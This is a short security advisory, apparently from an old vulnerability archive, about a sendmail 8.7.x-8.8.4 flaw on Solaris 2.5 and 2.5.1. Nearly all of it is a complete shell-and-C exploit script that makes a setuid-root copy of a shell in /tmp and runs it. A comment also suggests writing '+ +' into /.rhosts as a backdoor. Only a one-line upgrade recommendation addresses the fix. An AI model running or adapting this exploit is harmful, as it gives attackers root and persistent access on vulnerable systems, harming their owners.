COMMAND

    sendmail

SYSTEMS AFFECTED

    Solaris 2.5, 2.5.1

PROBLEM

    Remember Leshka's exploit for sedmail 8.7.x-8.8.2?  If not, go  to
    vulnerability #10 of sendmail group  in mUNIXes section.  Here  we
    have exploit for  Solaris by Spac3D0g  who claims that  this works
    for  sendmail  8.7.x-8.8.4.  This  exploit  should  create  a suid
    program /tmp/x that calls shell as root.

    #/bin/sh
    #
    # Modify  RUN in  x.c for  what you  wanna run,  and possibly  the
    # location or format of the ps command in the KILL line below  for
    # your platform.
    #
    # Or you could remove x.c alltogether and just put what you  wanna
    # do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
    #
    #
    cat << _EOF_ >/tmp/x.c
     #define RUN "/bin/ksh"
     #include <stdio.h>
     main()
     {
        execl(RUN,RUN,NULL);
     }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
     main()
     {
       execl("/usr/lib/sendmail","/tmp/smtpd",0);
     }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
     main()
     {
       setuid(0); setgid(0);
       system("chown root /tmp/x ;chmod 4755 /tmp/x");
     }
    _EOF_
    #
    #
    gcc -O  -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
       echo "leet..."
       /tmp/x
    fi

SOLUTION

    You should upgrade sendmail to 8.8.5 or any latest version.